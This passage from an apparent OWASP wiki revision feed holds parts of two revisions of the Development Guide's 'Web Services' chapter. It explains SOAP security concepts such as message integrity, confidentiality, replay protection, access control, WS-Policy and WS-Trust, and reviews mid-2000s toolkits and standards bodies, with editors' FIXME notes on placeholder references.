&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proof that the caller is who he claims to be is completely at the Web Service’s discretion. Whether it takes the supplied username and password’s hash and checks it against the backend user store, or extracts subject name from the X.509 certificate used for signing the message, verifies the certificate chain and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it should be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has much broader scope. So, whatever policy or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services deployed as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. Granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities, sort of WSDL on steroids. Through the published policy SOAP endpoints can advertise their security requirements, and their clients can apply appropriate measures of message protection to construct the requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types, one of them – for security, WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, both WS-Policy and WS-Trust specifications have not been submitted for standardization to public bodies, and their development is progressing via private collaboration of several companies, although it was opened up for other participants as well. As a positive factor, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is in theory. In practice, there are a lot of obstacles hidden among the way, and one of the major ones among them – security concerns about publicly exposing processing functions to intra- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction – incompatible authentication and authorization models for users, amount of trust between services themselves and ways of establishing such trust, maintaining secure connections, and synchronization of user directories or otherwise exchanging users’ attributes. These issues will be briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as users’ population tends to change frequently among different domains. So, how does a service in domain B decide whether it is going to trust user’s claim that he has been already authenticated in domain A? There exist different aspects of this problem. First – a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and authentication tokens from one domain are acceptable in another. In Web Services world, this would be accomplished by passing around a SAML or Kerberos token for a user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem is when users are not shared across domains, but merely the fact that a user with certain ID has successfully authenticated in another domain, as would be the case with several large corporations, which would like to form a partnership, but would be reluctant to share customers’ details. The decision to accept this request is then based on the inter-domain procedures, establishing special trust relationships and allowing for exchanging such opaque tokens, which would be an example of Federation relationships. Of those efforts, most notable example is Liberty Alliance project, which is now being used as a basis for SAML 2.0 specifications. The work in this area is still far from being completed, and most of the existing deployments are nothing more than POC or internal pilot projects than to real cross-companies deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations, which will be assessing conformance of the incoming SOAP messages to the applicable standards, as well as appropriately securing the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, .NET platform is not trying to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at the version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally sees the world. The next release of WSE, 3.0, is going to coincide with VS.2005 release and will take advantages of the latest innovations of .NET 2.0 platform in messaging and Web Application areas. [[Category:FIXME|old dates, is this current info?]]&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service, and the interoperability is a requirement (which is usually the case), in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle WS-Security’s and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said – WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security and WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions - similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for Web Service security specifications in the version 1.5 is only limited to implementation of the core WSS standard with username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On one hand, they usually provide rich functionality right off the shelf, on the other hand – its usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but handing system developers necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, check signatures, tokens, etc, before passing them on to the target Web Service. When applied to the outgoing SOAP messages, they act as a proxy, now altering the messages to decorate with the required security elements, sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide high level of integration with the existing enterprise infrastructure, relying on the back-end user and policy stores to look at the credentials, extracted from the WSS header, from the broader perspective. An example of such service is TransactionMinder from the former Netegrity – a Policy Enforcement Point for Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to the variety of the latest Web Service security standards, not only WSS. The usage simplicity is another attractive point of those systems - in the most trivial cases, the hardware box may be literally dropped in, plugged, and be used right away. These qualities come with a price, however – this performance and simplicity can be achieved as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as the inbound firewall and the outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (couple years old at most), or still being developed. Although standards development is done in committees, which, presumably, reduces risks by going through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no theory can possibly match the testing resulting from pounding by thousands of developers working in the real field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving the performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the already existing back-end software infrastructure, at least – not without making performance sacrifices. Another consideration whether hardware-based systems are the right solution – they are usually highly specialized in what they are doing, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services, but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, Web Service security standards are fairly complex, and have very steep learning curve associated with them. Most of the current products, dealing with Web Service security, suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all different policies, identities, keys, and protocols takes a lot of time and good understanding of the involved technologies, as most of the times errors that end users are seeing have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standard’s bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying the administrators with ready for deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since PKI mechanism has a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks in many cases, since questions of storing, updating, and recovering secret and private keys more often than not are not adequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59471</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59471"/>
				<updated>2009-04-26T11:59:55Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Freshness */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web services developers, and methods to address common issues. Due to the space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and warn about potential roadblocks on the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical that they are nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw:  Lets assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format.  A format that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on the server (even if it is not the intended recipient), they exist in the clear-text form, at least – temporarily. Storing the transmitted information at the intermediate aggravates the problem or destination servers in log files (where it can be browsed by anybody) and local caches.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said – the reality is that the most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such approach, and make conscious trade-offs at the design time, whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
&lt;br /&gt;
Second, passing credentials carries an inherited risk of their disclosure – either by sniffing them during the wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted, or just never sent “in the clear”. Usual ways to avoid sending sensitive credentials are using cryptographic hashing and/or signatures.&lt;br /&gt;
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
Usual means to protect against replayed messages is either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just tell the instant the message was created, or have additional information, like its expiration time, or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew,” whereas server or clients' clocks drift too much, preventing timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may be expiring while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “whether I trust the caller,” “whether it created this message.” Assuming that the caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). This may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from the bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually some mechanisms like checksum applied to ensure packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably tracked back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or with secret key-encryption (assuming the keys are only known to the two communicating parties) to ensure that any change will immediately result in a cryptographic error.&lt;br /&gt;
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure the integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. It may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since it is significantly faster than the asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires conducting an extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
&lt;br /&gt;
There is another significant problem here – the traditional HTTP firewalls do not help at stopping attacks at the Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and make intelligent decision about passing SOAP messages to their destination. The reader would need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required from the audits, is reconstructing the chain of events that led to a certain problem. Normally, this would be achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as the WS are concerned, such level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar, called Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages, expressed as XML Schema, and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is not strictly Web Service-specific, but rather general, it is important for this topic because of its close relation with the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach certain maturity, are often submitted to standardizations committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
